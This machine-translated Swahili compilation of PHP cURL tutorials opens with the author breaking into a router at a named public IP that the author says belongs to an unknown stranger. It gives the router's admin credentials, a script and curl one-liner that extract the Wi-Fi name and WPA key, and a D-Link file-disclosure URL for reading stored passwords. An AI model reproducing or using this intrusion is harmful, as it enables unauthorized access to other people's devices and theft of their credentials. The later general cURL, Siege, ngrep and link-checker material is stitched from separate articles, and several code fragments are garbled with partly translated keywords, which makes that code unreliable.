Tunaangalia mali kitendo. Wale. ukurasa wa mwisho ni login.php. Tunahitaji anwani kamili, kwa mfano hii http://188.35.8.64:8080/login.php

Hapa tunapata pia njia ya kutuma: mbinu="chapisho"

Ninajua pia kuingia na nenosiri: admin na qwerasdfzxcv

Ikiwezekana, hii sio kipanga njia changu (na sijui ni nani), kwa hivyo ikiwa unataka kunikasirisha, basi huna haja ya kufanya chochote kichafu kwenye router hii.

Wale. Mfuatano hutumwa kwa seva kutoka kwa fomu kwa kutumia mbinu ya POST. Kinadharia, hati yetu ya awali, ambayo tuliongeza mstari mpya, inapaswa kufanya kazi. Wale. uthibitishaji lazima kutokea.

0) ( echo "Curl error: " . curl_error($ch); ) mwingine ( ) curl_close($ch); ?>

Mstari mpya katika hati

curl_setopt($ch, CURLOPT_POSTFIELDS, "LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv");

Hapa curl_settop- kazi ambayo tayari inajulikana kwetu kwa kuweka chaguzi za cURL, CURLOPT_POSTFIELDS- hii ndiyo jina la chaguo tunaloweka. CURLOPT_POSTFIELDS ina data zote zinazohamishwa kwa kutumia mbinu ya POST. Naam, mstari yenyewe LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv- hii ndio data ambayo tunasambaza.

Ikiwa unachunguza kwa makini fomu, utaona kwamba pia ina mashamba yaliyofichwa. Na data inaweza kuchakatwa au kuongezwa kwa JavaScript.Unaweza kusoma haya yote, lakini napendelea njia rahisi zaidi.

Ninatumia Wireshark. Mpango huu umeundwa ili kunusa (kuzuia) trafiki. Na ni ndani yake kwamba ni rahisi sana kuona ni nini hasa kinachopitishwa kwenye tovuti.

Tazama video hii ndogo:

Wale. na anwani ambapo data huhamishiwa, nilikisia sawa. Lakini kamba iliyopitishwa iligeuka kuwa ngumu zaidi.

Niliingiza paramu sahihi, na pia nilibadilisha hati ili sio tu kuingia, lakini pia kupokea kitu kutoka kwa kipanga njia:

0) ( echo "Curl error: " . curl_error($ch); ) mwingine ( $target_url2 = "http://188.35.8.64:8080/bsc_wlan.php"; $ch2 = curl_init($target_url2); curl_setopt($ ch2, CURLOPT_RETURNTRANSFER, 1); $response_data2 = curl_exec($ch2); preg_match("|f.ssid.value = "(.*)";|", $response_data2, $results2); $results2 = str_replace("f .ssid.value = "", "", $matokeo2); $matokeo2 = str_replace("";", "", $matokeo2); mwangwi "jina la mtandao wa Wi-fi: $matokeo2
"; preg_match("|f_wpa.wpapsk1.value(.*)";|", $response_data2, $matokeo3); $matokeo3 = str_replace("f_wpa.wpapsk1.value", "", $matokeo3); $matokeo3 = str_replace("="", "", $matokeo3); $matokeo3 = str_replace("";", "", $matokeo3); echo "Nenosiri la mtandao wa Wi-Fi: $matokeo3"; ) curl_close($ch); ?>

Kwa njia, ikiwa mmiliki anasasisha nenosiri (lakini hajasasisha firmware), basi nenosiri jipya linaweza kutazamwa kila wakati kwenye http://188.35.8.64:8080/model/__show_info.php?REQUIRE_FILE=/var/etc /httpsswd

(Huu ni udhaifu unaojulikana sana katika vipanga njia vya D-Link DIR-300, D-Link DIR-320 na D-Link DAP-1353).

Uthibitishaji wa HTTP cURL kwenye mstari wa amri

Tayari tunajua anwani kamili, pamoja na kamba ya kupitishwa. Kwa hivyo ni rahisi:

Curl --data "ACTION_POST=LOGIN&FILECODE=&VERIFICATION_CODE=&LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv&login=Log+In+&VER_CODE=" http://188.35.8.64:8080/login.php

Nadhani kila kitu kiko wazi, kwani tayari tumezingatia tarehe hizi za mwisho. Ikiwa mtu haelewi, waulize kwenye maoni.

Mfano wa kutumia cURL kupata na kuchanganua data itakuwa seti ifuatayo ya amri:

Curl -s --data "ACTION_POST=LOGIN&FILECODE=&VERIFICATION_CODE=&LOGIN_USER=admin&LOGIN_PASSWD=qwerasdfzxcv&login=Log+In+&VER_CODE=" http://188.35.8.64:8080/login.php "&dev/dev/ " && echo "jina la mtandao wa Wi-Fi" && curl -s http://188.35.8.64:8080/bsc_wlan.php | grep -E "f.ssid.value = "(.)*";" | sed "s/f.ssid.value = "//" | sed "s/";//" && echo "nenosiri la mtandao wa Wi-Fi" && curl -s http://188.35.8.64:8080/bsc_wlan.php | grep -E "f_wpa.wpapsk1.(.)*";" | sed "s/f_wpa.wpapsk1.value//" | sed "s/";//" | sed "s/="//"

Kesi ngumu za idhini: AJAX, JQuery, JavaScript, n.k.

Itakuwa sahihi zaidi kuandika kichwa hiki kama ifuatavyo: Kesi za uidhinishaji "Ngumu". Wale. Weka neno "ngumu" katika alama za nukuu. Wanaonekana kuwa ngumu tu kwa mtazamo wa kwanza, wakati haijulikani wazi: wapi kutuma hutokea, ni majina gani ya shamba, ni nini hasa hutumwa, nk.

Lakini, kwa kweli, zote zinakuja kwa njia za POST au GET. Ili kuelewa ni nini hasa kinachotumwa, unaweza kuhifadhi ukurasa na fomu kwenye diski yako na kuongeza kazi ili kuonyesha data inayozalishwa kwa kutuma kwa kifungo cha kuwasilisha. Au hata rahisi zaidi - kama mimi, Wireshark.

Ikiwa data ni sahihi, lakini uthibitishaji haufanyiki, basi unahitaji kuchimba kwa njia zifuatazo:

• weka kamba sahihi ya kielekezaji
• weka kamba "sahihi" ya wakala wa mtumiaji.

Haya yote yanaweza kufanywa kwa kutumia njia za msingi za cURL, lakini sitaingia kwenye hilo. Somo lilikuwa tayari la kutosha, lakini pia nilitaka kuonyesha hila kadhaa na cURL.

Vidokezo na mbinu cURL

cURL na kupokea vidakuzi pamoja na CURLOPT_COOKIEJAR

Nadhani tayari ni wazi kwamba cURL hushughulikia vidakuzi kwa usahihi - huzihifadhi, huzitumia wakati seva inaziomba, nk. Lakini wakati mwingine vidakuzi vinahitaji kuhifadhiwa. Kuna chaguo kwa hii inayoitwa CURLOPT_COOKIEJAR, lakini si rahisi kila wakati kuitumia. Hii ndio hila yetu ya kwanza imejitolea.

Wakati mwingine, kutokana na jinsi PHP inavyosanidiwa kwenye seva, chaguo kama vile CURLOPT_COOKIEJAR (hukuruhusu kuhifadhi vidakuzi vilivyopokelewa kwenye faili) na CURLOPT_COOKIEFILE (hukuruhusu kutumia vidakuzi kutoka kwenye faili) hazipatikani kwetu. Kwa sababu wanasema kwamba kwa kutumia chaguzi hizi tunaweza kuiba faili yoyote kutoka kwa seva zao. Hapa kuna suluhisho la shida hii:

1) Hatutumii CURLOPT_FOLLOWLOCATION

2) Tumia curl_setopt($ch, CURLOPT_HEADER, 1)

3) Kusanya vidakuzi kutoka kwa kichwa kama hii:

Preg_match_all("|Set-Cookie: (.*);|U", $content, $matokeo); $cookies = implode(";", $matokeo);

4) Weka kwa kutumia curl_setopt($ch, CURLOPT_COOKIE, $cookies);

Ncha ya pili. Tunaweza kugeuka kutoka kwa washambuliaji hadi kuwa wahasiriwa. Ili kuepuka kuwa mwathirika wa shambulio la mtu wa kati, tunafanya hivi.

Tafadhali, kila mtu, acheni kuweka mipangilio ya CURLOPT_SSL_VERIFYPEER kuwa sivyo au 0. Ikiwa usakinishaji wako wa PHP hauna seti iliyosasishwa ya cheti cha mizizi CA, pakua moja kutoka kwa tovuti ya curl na uihifadhi kwenye seva yako:

Kisha weka njia katika faili yako ya php.ini, kwa mfano kwenye Windows:

Curl.cainfo=c:phpcacert.pem

Kuzima CURLOPT_SSL_VERIFYPEER kunaruhusu shambulio la mtu wa kati (MITM), ambalo hatutaki!

Kweli, kidokezo cha mwisho kwa leo. Je! unajua kwamba idadi kubwa ya maombi ya curl ya asynchronous inawezekana?

Kwa hili unaweza kutumia curl_multi_init. Maelezo na nambari ya mfano katika hati rasmi http://php.net/manual/ru/function.curl-multi-init.php

Kuhusu cURL kwenye mstari wa amri

Mwanaume curl

Sehemu ya pili ya somo pia imeandaliwa kwa kusoma kwa Kirusi cURL: "".

Mdhamini ni mpatanishi anayeaminika kati ya Washiriki wakati wa muamala.

Maisha ya msanidi wa wavuti yamefunikwa na ugumu. Haipendezi hasa wakati chanzo cha matatizo haya haijulikani. Je, hili ni tatizo la kutuma ombi, au kwa jibu, au kwa maktaba ya watu wengine, au ni hitilafu ya API ya nje? Kuna rundo la gadgets mbalimbali ambayo inaweza kufanya maisha yetu rahisi. Hapa kuna zana za mstari wa amri ambazo mimi binafsi naona kuwa za thamani sana.

cURL
cURL ni mpango wa kuhamisha data juu ya itifaki mbalimbali, sawa na wget. Tofauti kuu ni kwamba kwa chaguo-msingi wget huhifadhi kwenye faili, wakati cURL inatoka kwa safu ya amri. Hii inafanya kuwa rahisi sana kutazama maudhui ya tovuti. Kwa mfano, hapa kuna jinsi ya kupata IP yako ya nje ya sasa:

$ curl ifconfig.me 93.96.141.93
Chaguo -i(onyesha vyeo) na -I(onyesha vichwa pekee) fanya cURL kuwa zana bora ya kutatua majibu ya HTTP na kuchambua ni nini hasa seva inakutumia:

$ curl -I habrahabr.ru HTTP/1.1 200 Sawa Seva: nginx Tarehe: Alhamisi, 18 Ago 2011 14:15:36 GMT Content-Type: text/html; charset=utf-8 Muunganisho: endelea kuishi Weka-hai: timeout=25
Kigezo -L Pia ni muhimu, inalazimisha cURL kufuata maelekezo kwingine kiotomatiki. cURL inasaidia uthibitishaji wa HTTP, vidakuzi, kuelekeza kupitia proksi za HTTP, mipangilio ya mwongozo kwenye vichwa, na mengi zaidi.

Kuzingirwa
Kuzingirwa ni chombo cha kupima mzigo. Kwa kuongeza, ina chaguo rahisi -g, ambayo inafanana sana na curl -iL, lakini kwa kuongeza inakuonyesha pia vichwa vya ombi vya http. Huu hapa ni mfano kutoka google.com (baadhi ya vichwa vimeondolewa kwa ufupi):

$ kuzingirwa -g www.google.com GET / HTTP/1.1 Mwenyeji: www.google.com User-Agent: JoeDog/1.00 (X11; I; Siege 2.70) Muunganisho: funga HTTP/1.1 302 Mahali palipopatikana: http:// www.google.co.uk/ Content-Type: text/html; charset=UTF-8 Seva: gws Urefu wa Maudhui: 221 Muunganisho: funga GET / HTTP/1.1 Mpangishi: www.google.co.uk User-Agent: JoeDog/1.00 (X11; I; Siege 2.70) Muunganisho: funga HTTP/ 1.1 200 Sawa Aina ya Maudhui: maandishi/html; charset=ISO-8859-1 X-XSS-Protection: 1; mode=block Muunganisho: funga
Lakini kile Siege ni nzuri sana ni upimaji wa mzigo. Kama alama ya Apache ab, inaweza kutuma maombi mengi sambamba kwenye tovuti na kuona jinsi inavyoshughulikia trafiki. Mfano ufuatao unaonyesha jinsi tunavyojaribu Google kwa hoja 20 kwa sekunde 30 na kisha kuchapisha matokeo:

$ kuzingirwa -c20 www.google.co.uk -b -t30s ... Kuondoa kuzingirwa kwa seva... kumekamilika. Miamala: Miamala 1400 Upatikanaji: 100.00 % Muda uliopita: sekunde 29.22 Data imehamishwa: 13.32 MB Muda wa kujibu: sekunde 0.41 Kiwango cha ununuzi: 47.91 trans/sec Mapitio: 0.46 MB/sekunde5 Muamala mrefu:04 Utumizi wa muda mrefu:00 Umekamilika 19. shughuli est: 4.08 Muamala mfupi zaidi: 0.08
Moja ya vipengele muhimu zaidi vya Kuzingirwa ni kwamba inaweza kufanya kazi sio tu na anwani moja, lakini pia na orodha ya URL kutoka kwa faili. Hii ni nzuri kwa majaribio ya upakiaji kwa sababu unaweza kuiga trafiki halisi ya tovuti badala ya kugonga URL sawa tena na tena. Kwa mfano, hapa kuna jinsi ya kutumia Siege kupakia seva kwa kutumia anwani kutoka kwa logi yako ya Apache:

$ cut -d " " -f7 /var/log/apache2/access.log > urls.txt $ siege -c -b -f urls.txt
Ngrep
Kwa uchanganuzi mkubwa wa trafiki, kuna Wireshark na maelfu ya mipangilio, vichungi na usanidi. Pia kuna toleo la mstari wa amri tshark. Lakini kwa kazi rahisi, ninaona utendaji wa Wireshark kuwa wa ziada. Kwa hivyo isipokuwa ninahitaji silaha yenye nguvu, mimi hutumia . Inakuruhusu kufanya vivyo hivyo na pakiti za mtandao kama grep hufanya na faili.

Kwa trafiki ya wavuti, karibu kila wakati utataka kutumia parameta -W kuhifadhi umbizo la kamba pamoja na chaguo -q, ambayo huficha habari isiyohitajika kuhusu pakiti zisizolingana. Hapa kuna amri ya mfano ambayo inakata pakiti zote na GET au POST amri:

Ngrep -q -W byline "^(GET|POST) .*"
Unaweza kuongeza kichujio cha ziada cha pakiti, kwa mfano, na mwenyeji fulani, anwani ya IP au bandari. Hapa kuna kichujio cha trafiki yote kwenda na kutoka google.com, port 80, ambayo ina neno "tafuta".

Ngrep -q -W byline "tafuta" mwenyeji www.google.com na port 80

cURL ni zana maalum ambayo imeundwa kuhamisha faili na data kwa kutumia syntax ya URL. Teknolojia hii inasaidia itifaki nyingi kama vile HTTP, FTP, TELNET na zingine nyingi. cURL iliundwa awali kuwa zana ya safu ya amri. Kwa bahati kwetu, maktaba ya cURL inasaidiwa na lugha ya programu ya PHP. Katika makala hii tutaangalia baadhi ya kazi za juu za cURL, na pia kugusa matumizi ya vitendo ya ujuzi uliopatikana kwa kutumia PHP.

Kwa nini cURL?

Kwa kweli, kuna njia chache mbadala za sampuli za yaliyomo kwenye ukurasa wa wavuti. Katika visa vingi, haswa kwa sababu ya uvivu, nilitumia kazi rahisi za PHP badala ya cURL:

$ content = file_get_contents("http://www.nettuts.com"); // au $lines = faili ("http://www.nettuts.com"); // au faili ya kusoma("http://www.nettuts.com");

Walakini, vipengele hivi havina unyumbufu wowote na vina idadi kubwa ya mapungufu katika suala la kushughulikia makosa, nk. Zaidi ya hayo, kuna kazi fulani ambazo huwezi kukamilisha kwa vipengele hivi vya kawaida: mwingiliano wa vidakuzi, uthibitishaji, uwasilishaji wa fomu, upakiaji wa faili, n.k.

cURL ni maktaba yenye nguvu ambayo inasaidia itifaki nyingi tofauti, chaguo, na hutoa maelezo ya kina kuhusu maombi ya URL.

Muundo wa msingi

• Uanzishaji
• Ugawaji wa vigezo
• Utekelezaji na kuleta matokeo
• Kufungua kumbukumbu

// 1. uanzishaji $ch = curl_init(); // 2. bainisha vigezo, ikijumuisha url curl_setopt($ch, CURLOPT_URL, "http://www.nettuts.com"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); // 3. pata HTML kama matokeo $output = curl_exec($ch); // 4. funga uunganisho curl_close($ch);

Hatua #2 (hiyo ni, kupiga curl_setopt()) itajadiliwa zaidi katika nakala hii kuliko hatua zingine zote, kwa sababu. Katika hatua hii, mambo yote ya kuvutia zaidi na muhimu ambayo unahitaji kujua hutokea. Katika cURL kuna idadi kubwa ya chaguo tofauti ambazo lazima zibainishwe ili kuweza kusanidi ombi la URL kwa njia makini zaidi. Hatutazingatia orodha nzima, lakini tutazingatia tu kile ninachoona kuwa muhimu na muhimu kwa somo hili. Unaweza kusoma kila kitu kingine mwenyewe ikiwa mada hii inakuvutia.

Hitilafu katika Kukagua

Kwa kuongezea, unaweza pia kutumia taarifa za masharti ili kujaribu ikiwa operesheni imekamilika kwa mafanikio:

// ... $output = curl_exec($ch); ikiwa ($output === FALSE) ( echo "cURL Error: " . curl_error($ch); ) // ...

Hapa nakuomba utambue jambo muhimu sana: lazima tutumie "=== uongo" kwa kulinganisha, badala ya "== uongo". Kwa wale ambao hawajui, hii itatusaidia kutofautisha kati ya matokeo tupu na thamani ya boolean ya uwongo, ambayo itaonyesha hitilafu.

Kupokea taarifa

Hatua nyingine ya ziada ni kupata data kuhusu ombi la cURL baada ya kutekelezwa.

// ... curl_exec($ch); Maelezo ya $ = curl_getinfo($ch); echo "Ilichukua". $info["total_time"] . "sekunde kwa url". $info["url"]; //...

Safu iliyorejeshwa ina habari ifuatayo:

• "url"
• "aina_ya_maudhui"
• "http_code"
• "ukubwa_wa_kichwa"
• "omba_saizi"
• "wakati wa faili"
• "ssl_verify_result"
• "elekeza_hesabu upya"
• "jumla_muda"
• "namelookup_time"
• "connect_time"
• "pretransfer_time"
• "pakia_ya ukubwa"
• "size_download"
• "kasi_kupakua"
• "kupakia_kasi"
• "download_content_length"
• "upload_content_length"
• "starttransfer_time"
• "elekeza_wakati"

Ugunduzi wa kuelekeza upya kulingana na kivinjari

Katika mfano huu wa kwanza, tutaandika msimbo ambao unaweza kutambua uelekezaji upya wa URL kulingana na mipangilio mbalimbali ya kivinjari. Kwa mfano, baadhi ya tovuti huelekeza upya vivinjari vya simu ya mkononi, au kifaa kingine chochote.

Tutatumia chaguo la CURLOPT_HTTPHEADER kufafanua vichwa vyetu vya HTTP vinavyotoka, ikijumuisha jina la kivinjari cha mtumiaji na lugha zinazopatikana. Hatimaye tutaweza kubainisha ni tovuti zipi zinazotuelekeza kwenye URL tofauti.

// jaribu URL $urls = safu("http://www.cnn.com", "http://www.mozilla.com", "http://www.facebook.com"); // vivinjari vya majaribio $browsers = safu("standard" => safu ("user_agent" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5 .6 (.NET CLR 3.5.30729)", "language" => "en-us,en;q=0.5"), "iphone" => safu ("user_agent" => "Mozilla/5.0 (iPhone; U ; CPU kama Mac OS X; sw) AppleWebKit/420+ (KHTML, kama Gecko) Version/3.0 Mobile/1A537a Safari/419.3", "language" => "en"), "french" => safu ("wakala_wa_mtumiaji" => "Mozilla/4.0 (pambamba; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727)", "language" => "fr,fr-FR;q=0.5")); foreach ($urls as $url) ( echo "URL: $url\n"; foreach ($browsers as $test_name => $browser) ( $ch = curl_init(); // bainisha url curl_setopt($ch, CURLOPT_URL , $url); // bainisha vichwa vya kivinjari curl_setopt($ch, CURLOPT_HTTPHEADER, array("User-Agent: ($browser["user_agent"])", "Accept-Language: ($browser["language"] )" )); // hatuhitaji yaliyomo kwenye ukurasa curl_setopt($ch, CURLOPT_NOBODY, 1); // tunahitaji kupata vichwa vya HTTP curl_setopt($ch, CURLOPT_HEADER, 1); // rudisha matokeo badala yake of output curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); // je, kulikuwa na uelekezaji upya wa HTTP? ikiwa (preg_match("!Mahali: (.*)!", $output, $matches)) ( echo " $test_name: inaelekeza kwa $matches\n"; ) vinginevyo ( echo "$test_name: no redirection\n"; ) ) echo "\n\n"; )

Kwanza, tunabainisha orodha ya URL za tovuti ambazo tutaangalia. Kwa usahihi zaidi, tunahitaji anwani za tovuti hizi. Kisha tunahitaji kufafanua mipangilio ya kivinjari ili kujaribu kila moja ya URL hizi. Baada ya hayo, tutatumia kitanzi ambacho tutapitia matokeo yote yaliyopatikana.

Ujanja tunaotumia katika mfano huu kuweka mipangilio ya cURL utaturuhusu kupata sio maudhui ya ukurasa, lakini vichwa vya HTTP pekee (zilizohifadhiwa katika $output). Ifuatayo, kwa kutumia regex rahisi, tunaweza kuamua ikiwa kamba "Mahali:" ilikuwepo kwenye vichwa vilivyopokelewa.

Unapoendesha nambari hii, unapaswa kupata kitu kama hiki:

Kuunda ombi la POST kwa URL maalum

Wakati wa kuunda ombi la GET, data iliyotumwa inaweza kupitishwa kwa URL kupitia "kamba ya hoja". Kwa mfano, unapotafuta kwenye Google, neno la utafutaji linawekwa kwenye upau wa anwani wa URL mpya:

Http://www.google.com/search?q=ruseller

Huhitaji kutumia cURL kuiga ombi hili. Ikiwa uvivu utakushinda kabisa, tumia kitendakazi cha "file_get_contents()" ili kupata matokeo.

Lakini jambo ni kwamba baadhi ya fomu za HTML hutuma maombi ya POST. Data ya fomu hizi husafirishwa kupitia mwili wa ombi la HTTP, na si kama katika kesi ya awali. Kwa mfano, ikiwa ulijaza fomu kwenye jukwaa na kubofya kitufe cha kutafuta, basi kuna uwezekano mkubwa kwamba ombi la POST litafanywa:

Http://codeigniter.com/forums/do_search/

Tunaweza kuandika hati ya PHP ambayo inaweza kuiga aina hii ya ombi la URL. Kwanza hebu tuunde faili rahisi ya kukubali na kuonyesha data ya POST. Hebu tuite post_output.php:

Chapisha_r($_POST);

Kisha tunaunda hati ya PHP kufanya ombi la cURL:

$url = "http://localhost/post_output.php"; $post_data = safu ("foo" => "bar", "query" => "Nettuts", "action" => "Wasilisha"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // zinaonyesha kuwa tuna ombi la POST curl_setopt($ch, CURLOPT_POST, 1); // ongeza vigezo curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); $output = curl_exec($ch); curl_close($ch); echo pato la $;

Unapoendesha hati hii unapaswa kupata matokeo kama haya:

Kwa hivyo, ombi la POST lilitumwa kwa hati ya post_output.php, ambayo nayo hutoa safu ya superglobal $_POST, maudhui ambayo tulipata kwa kutumia cURL.

Inapakia faili

Kwanza, hebu tuunde faili ili kuizalisha na kuituma kwa upload_output.php faili:

Chapisha_r($_FILES);

Na hapa kuna nambari ya maandishi ambayo hufanya utendakazi hapo juu:

$url = "http://localhost/upload_output.php"; $post_data = safu ("foo" => "bar", // faili ya kupakia "upload" => "@C:/wamp/www/test.zip"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); $output = curl_exec($ch); curl_close($ch); echo pato la $;

Unapotaka kupakia faili, unachotakiwa kufanya ni kuipitisha kama kibadilishaji cha kawaida cha chapisho, kinachotanguliwa na alama ya @. Unapoendesha hati iliyoandikwa, utapata matokeo yafuatayo:

CURL nyingi

Mojawapo ya nguvu kuu za cURL ni uwezo wa kuunda vidhibiti "nyingi" vya cURL. Hii hukuruhusu kufungua muunganisho kwa URL nyingi kwa wakati mmoja na kwa usawa.

Katika toleo la classic la ombi la cURL, utekelezaji wa hati umesimamishwa, na inasubiri kukamilika kwa ombi la ombi la URL, baada ya hapo hati inaweza kuendelea. Ikiwa unakusudia kuingiliana na rundo zima la URL, hii itasababisha uwekezaji mkubwa wa wakati, kwani katika toleo la kawaida unaweza kufanya kazi na URL moja tu kwa wakati mmoja. Walakini, tunaweza kurekebisha hali hii kwa kutumia washughulikiaji maalum.

Wacha tuangalie nambari ya mfano niliyochukua kutoka kwa php.net:

// unda rasilimali kadhaa za cURL $ch1 = curl_init(); $ch2 = curl_init(); // bainisha URL na vigezo vingine curl_setopt($ch1, CURLOPT_URL, "http://lxr.php.net/"); curl_setopt($ch1, CURLOPT_HEADER, 0); curl_setopt($ch2, CURLOPT_URL, "http://www.php.net/"); curl_setopt($ch2, CURLOPT_HEADER, 0); //unda kidhibiti cha cURL nyingi $mh = curl_multi_init(); //ongeza vishikilizi kadhaa curl_multi_add_handle($mh,$ch1); curl_multi_add_handle($mh,$ch2); $ active = null; //execute fanya ( $mrc ​​​​= curl_multi_exec($mh, $active); ) huku ($mrc == CURLM_CALL_MULTI_PERFORM); wakati ($active && $mrc ​​​​== CURLM_OK) ( if (curl_multi_select($mh) != -1) ( fanya ( $mrc ​​​​= curl_multi_exec($mh, $active); ) wakati ($mrc == CURLM_CALL_MULTI_PERFORM); ) ) //closing curl_multi_remove_handle($mh, $ch1); curl_multi_remove_handle($mh, $ch2); curl_multi_close($mh);

Wazo ni kwamba unaweza kutumia vidhibiti vingi vya cURL. Kwa kutumia kitanzi rahisi, unaweza kufuatilia maombi ambayo bado hayajakamilika.

Kuna vitanzi viwili kuu katika mfano huu. Kitanzi cha kwanza cha kufanya wakati huita curl_multi_exec(). Chaguo hili la kukokotoa halizuiliki. Huendesha haraka iwezekanavyo na kurudisha hali ya ombi. Alimradi thamani iliyorejeshwa ni 'CURLM_CALL_MULTI_PERFORM' ya mara kwa mara, hii inamaanisha kuwa kazi bado haijakamilika (kwa mfano, vichwa vya http kwa sasa vinatumwa kwa URL); Ndiyo maana tunaendelea kuangalia thamani hii ya kurejesha hadi tupate matokeo tofauti.

Katika kitanzi kinachofuata tunaangalia hali wakati variable $ active = "kweli". Ni parameta ya pili kwa kazi ya curl_multi_exec(). Thamani ya tofauti hii itakuwa "kweli" mradi tu mabadiliko yoyote yaliyopo yanatumika. Ifuatayo tunaita kazi ya curl_multi_select(). Utekelezaji wake "umezuiwa" wakati kuna angalau muunganisho mmoja unaotumika, hadi jibu lipokewe. Hili linapotokea, tunarudi kwenye kitanzi kikuu ili kuendelea kutekeleza hoja.

Sasa hebu tutumie ujuzi huu kwa mfano ambao utakuwa muhimu sana kwa idadi kubwa ya watu.

Kuangalia viungo katika WordPress

Hebu fikiria blogu iliyo na idadi kubwa ya machapisho na ujumbe, ambayo kila moja ina viungo vya rasilimali za nje za mtandao. Baadhi ya viungo hivi huenda tayari vimekufa kwa sababu mbalimbali. Ukurasa unaweza kuwa umefutwa au tovuti haifanyi kazi kabisa.

Tutaunda hati ambayo itachambua viungo vyote na kupata tovuti zisizopakia na kurasa 404, na kisha kutupa ripoti ya kina.

Acha niseme mara moja kwamba hii sio mfano wa kuunda programu-jalizi ya WordPress. Hii ni uwanja mzuri wa majaribio kwa majaribio yetu.

Hebu hatimaye tuanze. Kwanza tunahitaji kupata viungo vyote kutoka kwa hifadhidata:

// usanidi $db_host = "localhost"; $db_user = "mzizi"; $db_pass = ""; $db_name = "wordpress"; $excluded_domains = safu("localhost", "www.mydomain.com"); $max_connections = 10; // uanzishaji wa vigezo $url_list = safu(); $working_urls = safu(); $dead_urls = safu(); $not_found_urls = safu(); $ active = null; // unganisha kwenye MySQL ikiwa (!mysql_connect($db_host, $db_user, $db_pass)) ( die("Haikuweza kuunganisha: " . mysql_error()); ) ikiwa (!mysql_select_db($db_name)) ( die("Ingeweza usichague db: " . mysql_error()); ) // chagua machapisho yote yaliyochapishwa ambayo yana viungo $q = "CHAGUA post_content KUTOKA kwa wp_posts WAPI post_content KAMA "%href=%" NA post_status = "publish" AND post_type = "post " "; $r = mysql_query($q) au kufa(mysql_error()); wakati ($d = mysql_fetch_assoc($r)) ( // tafuta viungo kwa kutumia misemo ya kawaida ikiwa (preg_match_all("!href=\"(.*?)\"!", $d["post_content"], $ mechi) ) ( foreach ($matches as $url) ( $tmp = parse_url($url); ikiwa (in_array($tmp["host"], $excluded_domains)) (endelea; ) $url_list = $url; ) ) / / ondoa nakala $url_list = array_values(array_unique($url_list)); ikiwa (!$url_list) ( die("Hakuna URL ya kuangalia"); )

Kwanza, tunatoa data ya usanidi kwa mwingiliano na hifadhidata, kisha tunaandika orodha ya vikoa ambavyo hazitashiriki katika hundi ($excluded_domains). Pia tunafafanua nambari inayoonyesha idadi ya upeo wa miunganisho ya wakati mmoja ambayo tutatumia kwenye hati yetu ($max_connections). Kisha tunajiunga na hifadhidata, chagua machapisho ambayo yana viungo, na kuyakusanya katika safu ($url_list).

Nambari ifuatayo ni ngumu kidogo, kwa hivyo pitia kutoka mwanzo hadi mwisho:

// 1. kishughulikiaji nyingi $mh = curl_multi_init(); // 2. ongeza seti ya URL za ($i = 0; $i< $max_connections; $i++) { add_url_to_multi_handle($mh, $url_list); } // 3. инициализация выполнения do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); // 4. основной цикл while ($active && $mrc == CURLM_OK) { // 5. если всё прошло успешно if (curl_multi_select($mh) != -1) { // 6. делаем дело do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); // 7. если есть инфа? if ($mhinfo = curl_multi_info_read($mh)) { // это значит, что запрос завершился // 8. извлекаем инфу $chinfo = curl_getinfo($mhinfo["handle"]); // 9. мёртвая ссылка? if (!$chinfo["http_code"]) { $dead_urls = $chinfo["url"]; // 10. 404? } else if ($chinfo["http_code"] == 404) { $not_found_urls = $chinfo["url"]; // 11. рабочая } else { $working_urls = $chinfo["url"]; } // 12. чистим за собой curl_multi_remove_handle($mh, $mhinfo["handle"]); // в случае зацикливания, закомментируйте данный вызов curl_close($mhinfo["handle"]); // 13. добавляем новый url и продолжаем работу if (add_url_to_multi_handle($mh, $url_list)) { do { $mrc = curl_multi_exec($mh, $active); } while ($mrc == CURLM_CALL_MULTI_PERFORM); } } } } // 14. завершение curl_multi_close($mh); echo "==Dead URLs==\n"; echo implode("\n",$dead_urls) . "\n\n"; echo "==404 URLs==\n"; echo implode("\n",$not_found_urls) . "\n\n"; echo "==Working URLs==\n"; echo implode("\n",$working_urls); function add_url_to_multi_handle($mh, $url_list) { static $index = 0; // если у нас есть ещё url, которые нужно достать if ($url_list[$index]) { // новый curl обработчик $ch = curl_init(); // указываем url curl_setopt($ch, CURLOPT_URL, $url_list[$index]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_NOBODY, 1); curl_multi_add_handle($mh, $ch); // переходим на следующий url $index++; return true; } else { // добавление новых URL завершено return false; } }

Hapa nitajaribu kuelezea kila kitu kwa undani. Nambari zilizo kwenye orodha zinalingana na nambari kwenye maoni.

1. 1. Unda kidhibiti nyingi;
2. 2. Tutaandika kitendakazi cha add_url_to_multi_handle() baadaye kidogo. Kila inapoitwa, usindikaji wa url mpya utaanza. Hapo awali, tunaongeza URL 10 ($max_connections);
3. 3. Ili kuanza, lazima tuendeshe kazi ya curl_multi_exec(). Alimradi inarejesha CURLM_CALL_MULTI_PERFORM, bado tuna jambo la kufanya. Tunahitaji hii hasa ili kuunda miunganisho;
4. 4. Inayofuata inakuja kitanzi kikuu, ambacho kitafanya kazi kwa muda mrefu kama tuna angalau uhusiano mmoja wa kazi;
5. 5. curl_multi_select() hutegemea utafutaji wa URL ukamilike;
6. 6. Kwa mara nyingine tena, tunahitaji kupata cURL kufanya kazi fulani, yaani kuleta data ya majibu ya kurudisha;
